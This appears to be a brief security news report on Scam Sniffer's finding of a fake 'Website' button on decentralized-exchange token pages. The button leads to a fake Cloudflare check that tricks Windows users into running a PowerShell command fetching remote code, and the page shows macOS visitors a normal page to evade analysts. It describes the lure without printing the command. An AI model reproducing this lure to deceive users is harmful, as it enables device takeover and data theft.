A malicious Website button found on DEX platforms

Researchers from Scam Sniffer reported a dangerous attack targeting users of decentralized exchanges. On token information pages, such as FUCKLAUNCH, a fake Website button was found leading to a malicious domain. When the link is clicked, the user is prompted to undergo a fake verification through the Cloudflare system. However, instead of the usual verification, the victim is faced with instructions to execute a dangerous PowerShell command.

On Windows devices, a message appears prompting the user to press Windows + R, paste the copied text, and confirm the input. In reality, the user is executing a PowerShell script that downloads and runs code from an external site. This gives the attackers direct access to the computer, allowing them to steal data or install malware.

On macOS devices, no activity occurs - users see a normal page. This is done deliberately to hide the attack from analysts and reduce the likelihood of detection.